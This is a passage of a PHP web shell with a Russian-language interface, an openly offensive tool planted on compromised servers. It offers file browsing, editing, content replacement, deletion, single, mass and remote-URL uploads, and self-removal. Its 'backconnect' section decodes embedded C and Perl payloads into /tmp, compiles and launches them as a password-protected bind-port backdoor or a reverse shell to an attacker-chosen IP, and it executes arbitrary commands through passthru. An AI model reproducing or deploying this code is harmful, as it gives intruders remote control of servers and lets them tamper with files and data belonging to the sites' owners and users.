  1040. deldir($dir);
  1041. $rback=$_GET['rback'];
  1042. @$rback=explode("/",$rback);
  1043. $crb=count($rback);
  1044. for($i=0; $i<$crb-1; $i++){
  1045. @$x.=$rback[$i]."/";
  1046. }
  1047. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?ac=navigation&d=".@$x."'\">";
  1048. echo $copyr;
  1049. exit;}
  1050. if(@$_GET['replace']=="1"){
  1051. $ip=@$_SERVER['REMOTE_ADDR'];
  1052. $d=$_GET['d'];
  1053. $e=$_GET['e'];
  1054. @$de=$d."/".$e;
  1055. $de=str_replace("//","/",$de);
  1056. $e=@$e;
  1057. echo $mymenu ;
  1058. echo "
  1059. Средство замены:<br>
  1060. (ты можешь заменить любой текст)<br>
  1061. Файл: $de<br>
  1062. <form method=post>
  1063. 1. Твой IP<br>
  1064. 2. IP microsoft.com :)<br>
  1065. Заменять это <input name=this size=30 value=$ip> этим <input name=bythis size=30 value=207.46.245.156>
  1066. <input type=submit name=doit value=Заменить>
  1067. </form>
  1068. ";
  1069. if(@$_POST['doit']){
  1070. $filename="$d/$e";
  1071. $fd = @fopen ($filename, "r");
  1072. $rpl = @fread ($fd, @filesize ($filename));
  1073. $re=str_replace("$this","$bythis",$rpl);
  1074. $x=@fopen("$d/$e","w");
  1075. @fwrite($x,"$re");
  1076. echo "<br><center>$this заменено на $bythis<br>
  1077. [<a href='$php_self?ac=navigation&d=$d&e=$e'>Посмотреть файл</a>]<br><br><Br>";
  1078. }
  1079. echo $copyr;
  1080. exit;}
  1081. if(@$_GET['yes']=="yes"){
  1082. $d=@$_GET['d']; $e=@$_GET['e'];
  1083. unlink($d."/".$e);
  1084. $delresult="$d/$e удален! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
  1085. }
  1086. if(@$_GET['clean']=="1"){
  1087. @$e=$_GET['e'];
  1088. $x=fopen("$d/$e","w");
  1089. fwrite($x,"");
  1090. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
  1091. exit;
  1092. }
  1093. if(@$_GET['e']){
  1094. $d=@$_GET['d'];
  1095. $e=@$_GET['e'];
  1096. $pinf=pathinfo($e);
  1097. if(in_array(".".@$pinf['extension'],$images)){
  1098. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
  1099. exit;}
  1100. $filename="$d/$e";
  1101. $fd = @fopen ($filename, "r");
  1102. $c = @fread ($fd, @filesize ($filename));
  1103. $c=htmlspecialchars($c);
  1104. $de=$d."/".$e;
  1105. $de=str_replace("//","/",$de);
  1106. if(is_file($de)){
  1107. if(!is_writable($de)){echo "<font color=red><br><b>ТОЛЬКО ЧТЕНИЕ</b></font><br>";}}
  1108. echo $mymenu ;
  1109. echo "
  1110. Содержимое файла:<br>
  1111. $de
  1112. <br>
  1113. <table width=100% border=1 cellpadding=0 cellspacing=0>
  1114. <tr><td><pre>
  1115. $c
  1116. </pre></td></tr>
  1117. </table>";
  1118. if(@$_GET['delete']=="1"){
  1119. $delete=$_GET['delete'];
  1120. echo "
  1121. Удаление: ты уверен?<br>
  1122. <a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Да</a> || <a href='$php_self?no=1'>Нет</a>
  1123. <br>
  1124. ";
  1125. if(@$_GET['yes']=="yes"){
  1126. @$d=$_GET['d']; @$e=$_GET['e'];
  1127. echo $delresult;
  1128. }
  1129. if(@$_GET['no']){
  1130. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
  1131. ";
  1132. }
  1133. } #end of delete
  1134. echo $copyr;
  1135. exit;
  1136. } #end of e
  1137. if(@$_GET['edit']=="1"){
  1138. @$d=$_GET['d'];
  1139. @$ef=$_GET['ef'];
  1140. if(is_file($d."/".$ef)){
  1141. if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ТОЛЬКО ЧТЕНИЕ</b></font><br>";}}
  1142. echo $mymenu ;
  1143. $filename="$d/$ef";
  1144. $fd = @fopen ($filename, "r");
  1145. $c = @fread ($fd, @filesize ($filename));
  1146. $c=htmlspecialchars($c);
  1147. $de=$d."/".$ef;
  1148. $de=str_replace("//","/",$de);
  1149. echo "
  1150. Редактирование:<br>
  1151. $de<br>
  1152. <form method=post>
  1153. <input type=HIDDEN name=filename value='$d/$ef'>
  1154. <textarea cols=143 rows=30 name=editf>$c</textarea>
  1155. <br>
  1156. <input type=submit name=save value='Сохранить изменения'></form><br>
  1157. ";
  1158. if(@$_POST['save']){
  1159. $editf=@$_POST['editf'];
  1160. $editf=stripslashes($editf);
  1161. $f=fopen($filename,"w+");
  1162. fwrite($f,"$editf");
  1163. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
  1164. exit;
  1165. }
  1166. echo $copyr;
  1167. exit;
  1168. }
  1169. echo"
  1170. <table width=100% cellpadding=1 cellspacing=0 class=hack>
  1171. <tr><td bgcolor=#4d9ef0><center><b>Название</b></td><td bgcolor=#4d9ef0><center><b>Тип</b></td><td bgcolor=#4d9ef0><b>Размер</b></td><td bgcolor=#4d9ef0><center><b>Владелец/Группа</b></td><td bgcolor=#4d9ef0><b>Права</b></td></tr>
  1172. ";
  1173. $dirs=array();
  1174. $files=array();
  1175. $dh = @opendir($d) or die("<table width=100%><tr><td><center>Каталог не существует или доступ к нему запрещен!</center><br>$copyr</td></tr></table>");
  1176. while (!(($file = readdir($dh)) === false)) {
  1177. if ($file=="." || $file=="..") continue;
  1178. if (@is_dir("$d/$file")) {
  1179. $dirs[]=$file;
  1180. }else{
  1181. $files[]=$file;
  1182. }
  1183. sort($dirs);
  1184. sort($files);
  1185. $fz=@filesize("$d/$file");
  1186. }
  1187. function perm($perms){
  1188. if (($perms & 0xC000) == 0xC000) {
  1189. $info = 's';
  1190. } elseif (($perms & 0xA000) == 0xA000) {
  1191. $info = 'l';
  1192. } elseif (($perms & 0x8000) == 0x8000) {
  1193. $info = '-';
  1194. } elseif (($perms & 0x6000) == 0x6000) {
  1195. $info = 'b';
  1196. } elseif (($perms & 0x4000) == 0x4000) {
  1197. $info = 'd';
  1198. } elseif (($perms & 0x2000) == 0x2000) {
  1199. $info = 'c';
  1200. } elseif (($perms & 0x1000) == 0x1000) {
  1201. $info = 'p';
  1202. } else {
  1203. $info = 'u';
  1204. }
  1205. $info .= (($perms & 0x0100) ? 'r' : '-');
  1206. $info .= (($perms & 0x0080) ? 'w' : '-');
  1207. $info .= (($perms & 0x0040) ?
  1208. (($perms & 0x0800) ? 's' : 'x' ) :
  1209. (($perms & 0x0800) ? 'S' : '-'));
  1210. $info .= (($perms & 0x0020) ? 'r' : '-');
  1211. $info .= (($perms & 0x0010) ? 'w' : '-');
  1212. $info .= (($perms & 0x0008) ?
  1213. (($perms & 0x0400) ? 's' : 'x' ) :
  1214. (($perms & 0x0400) ? 'S' : '-'));
  1215. $info .= (($perms & 0x0004) ? 'r' : '-');
  1216. $info .= (($perms & 0x0002) ? 'w' : '-');
  1217. $info .= (($perms & 0x0001) ?
  1218. (($perms & 0x0200) ? 't' : 'x' ) :
  1219. (($perms & 0x0200) ? 'T' : '-'));
  1220. return $info;
  1221. }
  1222. for($i=0; $i<count($dirs); $i++){
  1223. if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
  1224. else{$info="<font color=red><li>&nbsp;R</font>";}
  1225. $perms = @fileperms($d."/".$dirs[$i]);
  1226. $owner = @fileowner($d."/".$dirs[$i]);
  1227. if($os=="unix"){
  1228. $fileownera=posix_getpwuid($owner);
  1229. $owner=$fileownera['name'];
  1230. }
  1231. $group = @filegroup($d."/".$dirs[$i]);
  1232. if($os=="unix"){
  1233. $groupinfo = posix_getgrgid($group);
  1234. $group=$groupinfo['name'];
  1235. }
  1236. $info=perm($perms);
  1237. if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
  1238. $linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
  1239. $linkd=str_replace("//","/",$linkd);
  1240. echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
  1241. }
  1242. for($i=0; $i<count($files); $i++){
  1243. if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
  1244. else{$info="<font color=red><li>&nbsp;R</font>";}
  1245. $size=@filesize($d."/".$files[$i]);
  1246. $perms = @fileperms($d."/".$files[$i]);
  1247. $owner = @fileowner($d."/".$files[$i]);
  1248. if($os=="unix"){
  1249. $fileownera=posix_getpwuid($owner);
  1250. $owner=$fileownera['name'];
  1251. }
  1252. $group = @filegroup($d."/".$files[$i]);
  1253. if($os=="unix"){
  1254. $groupinfo = posix_getgrgid($group);
  1255. $group=$groupinfo['name'];
  1256. }
  1257. $info=perm($perms);
  1258. if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
  1259. if ($size < 1024){$siz=$size.' b';
  1260. }else{
  1261. if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
  1262. if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
  1263. if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
  1264. }}}
  1265. echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href='$php_self?ac=navigation&d=$d&download=$files[$i]' title='Download $files[$i]'><font size=2 face=Webdings color=green>`</font></a></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
  1266. }
  1267. echo "</table></td></tr></table>";
  1268. echo $copyr;
  1269. break;
  1270. // Установка бекдора
  1271. case "backconnect":
  1272. echo "<b>Установка бекдора / открытие порта</b>";
  1273. echo "<form name=bind method=POST>";
  1274. echo "<font face=Verdana size=-2>";
  1275. echo "<b>Открыть порт </b>";
  1276. echo "<input type=text name=port size=15 value=11457>&nbsp;";
  1277. echo "<b>Пароль для доступа </b>";
  1278. echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
  1279. echo "<b>Использовать </b>";
  1280. echo "<select size=\"1\" name=\"use\">";
  1281. echo "<option value=\"Perl\">Perl</option>";
  1282. echo "<option value=\"C\">C</option>";
  1283. echo "</select>&nbsp;";
  1284. echo "<input type=hidden name=dir value=".$dir.">";
  1285. echo "<input type=submit name=submit value=Открыть>";
  1286. echo "</font>";
  1287. echo "</form>";
  1288. echo "<b>Установка бекдора / connect-back</b>";
  1289. echo "<form name=back method=POST>";
  1290. echo "<font face=Verdana size=-2>";
  1291. echo "<b>IP-адрес </b>";
  1292. echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
  1293. echo "<b>Порт </b>";
  1294. echo "<input type=text name=port size=15 value=31337>&nbsp;";
  1295. echo "<b>Использовать </b>";
  1296. echo "<select size=\"1\" name=\"use\">";
  1297. echo "<option value=\"Perl\">Perl</option>";
  1298. echo "<option value=\"C\">C</option>";
  1299. echo "</select>&nbsp;";
  1300. echo "<input type=hidden name=dir value=".$dir.">";
  1301. echo "<input type=submit name=submit value=Выполнить>";
  1302. echo "</font>";
  1303. echo "</form>";
  1304. /* port bind C */
  1305. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  1306. {
  1307. $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
  1308. if($err==1)
  1309. {
  1310. echo "<font color=red face=Fixedsys><div align=center>ОШИБКА! Невозможна запись в /tmp/bd.c</div></font>";
  1311. $err=0;
  1312. }
  1313. else
  1314. {
  1315. fputs($w_file,base64_decode($port_bind_bd_c));
  1316. fclose($w_file);
  1317. $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
  1318. unlink("/tmp/bd.c");
  1319. $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
  1320. $blah=exec($bind_string);
  1321. $_POST['cmd']="ps -aux | grep bd";
  1322. $err=0;
  1323. }
  1324. }
  1325. /* port bind Perl */
  1326. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
  1327. {
  1328. $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
  1329. if($err==1)
  1330. {
  1331. echo "<font color=red face=Fixedsys><div align=center>ОШИБКА! Невозможна запись в /tmp/</div></font>";
  1332. $err=0;
  1333. }
  1334. else
  1335. {
  1336. fputs($w_file,base64_decode($port_bind_bd_pl));
  1337. fclose($w_file);
  1338. $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
  1339. $blah=exec($bind_string);
  1340. $_POST['cmd']="ps -aux | grep bdpl";
  1341. $err=0;
  1342. }
  1343. }
  1344. /* back connect Perl */
  1345. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
  1346. {
  1347. $w_file=fopen("/tmp/back","ab+") or $err=1;
  1348. if($err==1)
  1349. {
  1350. echo "<font color=red face=Fixedsys><div align=center>ОШИБКА! Невозможна запись в /tmp/</div></font>";
  1351. $err=0;
  1352. }
  1353. else
  1354. {
  1355. fputs($w_file,base64_decode($back_connect));
  1356. fclose($w_file);
  1357. $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
  1358. $blah=exec($bc_string);
  1359. $_POST['cmd']="echo \"Сейчас скрипт коннектится к ".$_POST['ip']." port ".$_POST['port']." ...\"";
  1360. $err=0;
  1361. }
  1362. }
  1363. /* back connect C */
  1364. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
  1365. {
  1366. $w_file=fopen("/tmp/back.c","ab+") or $err=1;
  1367. if($err==1)
  1368. {
  1369. echo "<font color=red face=Fixedsys><div align=center>ОШИБКА! Невозможна запись в /tmp/back.c</div></font>";
  1370. $err=0;
  1371. }
  1372. else
  1373. {
  1374. fputs($w_file,base64_decode($back_connect_c));
  1375. fclose($w_file);
  1376. $blah=exec("gcc -o /tmp/backc /tmp/back.c");
  1377. unlink("/tmp/back.c");
  1378. $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
  1379. $blah=exec($bc_string);
  1380. $_POST['cmd']="echo \"Сейчас скрипт коннектится к ".$_POST['ip']." port ".$_POST['port']." ...\"";
  1381. $err=0;
  1382. }
  1383. }
  1384. echo "<font face=Verdana size=-2>Выполненная команда: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
  1385. echo "<b>";
  1386. echo "<br>Результат: ";
  1387. echo "<font color=red size=2";
  1388. print "".passthru($_POST['cmd'])."";
  1389. echo "</font></b>";
  1390. break;
  1391. // Uploading
  1392. case "upload":
  1393. echo <<<HTML
  1394. <b>Загрузка файлов</b>
  1395. <a href='$php_self?ac=massupload&d=$d&t=massupload'>* Загрузить большое количество файлов *</a><br><br>
  1396. <table>
  1397. <form enctype="multipart/form-data" action="$self" method="POST">
  1398. <input type="hidden" name="ac" value="upload">
  1399. <tr>
  1400. <td>Файл:</td>
  1401. <td><input size="48" name="file" type="file"></td>
  1402. </tr>
  1403. <tr>
  1404. <td>Папка:</td>
  1405. <td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Послать"></td><br>
  1406. $tend
  1407. HTML;
  1408. if (isset($_POST['path'])){
  1409. $uploadfile = $_POST['path'].$_FILES['file']['name'];
  1410. if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
  1411. if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
  1412. echo "Файл успешно загружен в папку $uploadfile\n";
  1413. echo "Имя:" .$_FILES['file']['name']. "\n";
  1414. echo "Размер:" .$_FILES['file']['size']. "\n";
  1415. } else {
  1416. print "Не удаётся загрузить файл. Info:\n";
  1417. print_r($_FILES);
  1418. }
  1419. }
  1420. echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
  1421. <b>Загрузка файлов с удаленного компьютера:</b><br>
  1422. HTTP-путь к файлу: <br>
  1423. <input type='text' name='file3' value='http://' size=40><br>
  1424. Название файла или путь с названием файла: <br>
  1425. <input type='text' name='file2' value='$docr/' size=40><br>
  1426. <input type='submit' value='Загрузить файл'></form>";
  1427. $data = @implode("", file($file3));
  1428. $fp = @fopen($file2, "wb");
  1429. @fputs($fp, $data);
  1430. $ok = @fclose($fp);
  1431. if($ok)
  1432. {
  1433. $size = filesize($file2)/1024;
  1434. $sizef = sprintf("%.2f", $size);
  1435. print "<br><center>Вы загрузили: <b>файл <u>$file2</u> размером</b> (".$sizef."кБ) </center>";
  1436. }
  1437. else
  1438. {
  1439. print "<br><center><font color=red size = 2><b>Ошибка загрузки файла</b></font></center>";
  1440. }
  1441. break;
  1442. // Tools
  1443. case "tools":
  1444. echo "<form method=post>Генерация md5-шифра<br><input name=md5 size=30></form><br>";
  1445. @$md5=@$_POST['md5'];
  1446. if(@$_POST['md5']){ echo "md5 сгенерирован:<br> ".md5($md5)."";}
  1447. echo "<br>
  1448. <form method=post>Кодирование/декодирование base64<br><input name=base64 size=30></form><br>";
  1449. if(@$_POST['base64']){
  1450. @$base64=$_POST['base64'];
  1451. echo "
  1452. Кодировано:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
  1453. Декодировано: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
  1454. echo "<br>
  1455. <form method=post>DES-кодирование:<br><input name=des size=30></form><br>";
  1456. if(@$_POST['des']){
  1457. @$des=@$_POST['des'];
  1458. echo "DES сгенерирован: <br>".crypt($des)."";}
  1459. echo "<br>
  1460. <form method=post>SHA1-кодирование:<br><input name=sha1 size=30></form><br>";
  1461. if(@$_POST['sha1']){
  1462. @$des=@$_POST['sha1'];
  1463. echo "SHA1 сгенерирован: <br>".sha1($sha1a)."";}
  1464. echo "<form method=POST>";
  1465. echo "html-код -> шестнадцатиричные значения<br><input type=text name=data size=30>";
  1466. if (isset($_POST['data']))
  1467. {
  1468. echo "<br><br><b>Результат:<br></b>";
  1469. $str=str_replace("%20","",$_POST['data']);
  1470. for($i=0;$i<strlen($str);$i++)
  1471. {
  1472. $hex=dechex(ord($str[$i]));
  1473. if ($str[$i]=='&') echo "$str[$i]";
  1474. else if ($str[$i]!='\\') echo "%$hex";
  1475. }
  1476. }
  1477. exit;
  1478. break;
  1479. // Mass Uploading
  1480. case "massupload":
  1481. echo "
  1482. Масовая загрузка файлов:<br>
  1483. <form enctype=\"multipart/form-data\" method=post>
  1484. <input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
  1485. <input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
  1486. <input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
  1487. <input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
  1488. <input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
  1489. <input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
  1490. <input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
  1491. <input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
  1492. <input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
  1493. <input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
  1494. <input name=where size=43 value='$docr'><br>
  1495. <input type=submit value=Загрузить name=massupload>
  1496. </form><br>";
  1497. if(@$_POST['massupload']){
  1498. $where=@$_POST['where'];
  1499. $uploadfile1 = "$where/".@$_FILES['text1']['name'];
  1500. $uploadfile2 = "$where/".@$_FILES['text2']['name'];
  1501. $uploadfile3 = "$where/".@$_FILES['text3']['name'];
  1502. $uploadfile4 = "$where/".@$_FILES['text4']['name'];
  1503. $uploadfile5 = "$where/".@$_FILES['text5']['name'];
  1504. $uploadfile6 = "$where/".@$_FILES['text6']['name'];
  1505. $uploadfile7 = "$where/".@$_FILES['text7']['name'];
  1506. $uploadfile8 = "$where/".@$_FILES['text8']['name'];
  1507. $uploadfile9 = "$where/".@$_FILES['text9']['name'];
  1508. $uploadfile10 = "$where/".@$_FILES['text10']['name'];
  1509. $uploadfile11 = "$where/".@$_FILES['text11']['name'];
  1510. $uploadfile12 = "$where/".@$_FILES['text12']['name'];
  1511. $uploadfile13 = "$where/".@$_FILES['text13']['name'];
  1512. $uploadfile14 = "$where/".@$_FILES['text14']['name'];
  1513. $uploadfile15 = "$where/".@$_FILES['text15']['name'];
  1514. $uploadfile16 = "$where/".@$_FILES['text16']['name'];
  1515. $uploadfile17 = "$where/".@$_FILES['text17']['name'];
  1516. $uploadfile18 = "$where/".@$_FILES['text18']['name'];
  1517. $uploadfile19 = "$where/".@$_FILES['text19']['name'];
  1518. $uploadfile20 = "$where/".@$_FILES['text20']['name'];
  1519. if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
  1520. $where=str_replace("\\\\","\\",$where);
  1521. echo "<i>Загружено: $uploadfile1</i><br>";}
  1522. if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
  1523. $where=str_replace("\\\\","\\",$where);
  1524. echo "<i>Загружено: $uploadfile2</i><br>";}
  1525. if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
  1526. $where=str_replace("\\\\","\\",$where);
  1527. echo "<i>Загружено: $uploadfile3</i><br>";}
  1528. if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
  1529. $where=str_replace("\\\\","\\",$where);
  1530. echo "<i>Загружено: $uploadfile4</i><br>";}
  1531. if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
  1532. $where=str_replace("\\\\","\\",$where);
  1533. echo "<i>Загружено: $uploadfile5</i><br>";}
  1534. if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
  1535. $where=str_replace("\\\\","\\",$where);
  1536. echo "<i>Загружено: $uploadfile6</i><br>";}
  1537. if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
  1538. $where=str_replace("\\\\","\\",$where);
  1539. echo "<i>Загружено: $uploadfile7</i><br>";}
  1540. if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
  1541. $where=str_replace("\\\\","\\",$where);
  1542. echo "<i>Загружено: $uploadfile8</i><br>";}
  1543. if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
  1544. $where=str_replace("\\\\","\\",$where);
  1545. echo "<i>Загружено: $uploadfile9</i><br>";}
  1546. if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
  1547. $where=str_replace("\\\\","\\",$where);
  1548. echo "<i>Загружено: $uploadfile10</i><br>";}
  1549. if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
  1550. $where=str_replace("\\\\","\\",$where);
  1551. echo "<i>Загружено: $uploadfile11</i><br>";}
  1552. if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
  1553. $where=str_replace("\\\\","\\",$where);
  1554. echo "<i>Загружено: $uploadfile12</i><br>";}
  1555. if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
  1556. $where=str_replace("\\\\","\\",$where);
  1557. echo "<i>Загружено: $uploadfile13</i><br>";}
  1558. if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
  1559. $where=str_replace("\\\\","\\",$where);
  1560. echo "<i>Загружено: $uploadfile14</i><br>";}
  1561. if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
  1562. $where=str_replace("\\\\","\\",$where);
  1563. echo "<i>Загружено: $uploadfile15</i><br>";}
  1564. if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
  1565. $where=str_replace("\\\\","\\",$where);
  1566. echo "<i>Загружено: $uploadfile16</i><br>";}
  1567. if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
  1568. $where=str_replace("\\\\","\\",$where);
  1569. echo "<i>Загружено: $uploadfile17</i><br>";}
  1570. if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
  1571. $where=str_replace("\\\\","\\",$where);
  1572. echo "<i>Загружено: $uploadfile18</i><br>";}
  1573. if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
  1574. $where=str_replace("\\\\","\\",$where);
  1575. echo "<i>Загружено: $uploadfile19</i><br>";}
  1576. if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
  1577. $where=str_replace("\\\\","\\",$where);
  1578. echo "<i>Загружено: $uploadfile20</i><br>";}
  1579. }
  1580. exit;
  1581. break;
  1582. case "selfremover":
  1583. print "<tr><td>";
  1584. print "<center><font color=red face=verdana size=3>Ты уверен, что хочешь удалить этот шелл с сервера?<br><br>
  1585. <a href='$php_self?p=yes'>Да, хочу</a> | <a href='$php_self?'>Нет, пусть еще побудет</a><br><br><br>
  1586. Будем удалять <u>";
  1587. $path=__FILE__;
  1588. print $path;
  1589. print "</u>?</td></tr></center></table>";
  1590. die;
  1591. }
  1592. if($p=="yes"){
  1593. $path=__FILE__;
  1594. @unlink($path);
  1595. $path=str_replace("\\","/",$path);
  1596. if(file_exists($path)){$hmm="Файл невозможно удалить!";
  1597. print "<tr><td><font color=red>Файл $path не удален!</td></tr>";
  1598. }else{$hmm="Удален";}
  1599. print "<script>alert('$path $hmm');</script>";
  1600. }
  1601. break;
  1602. ?>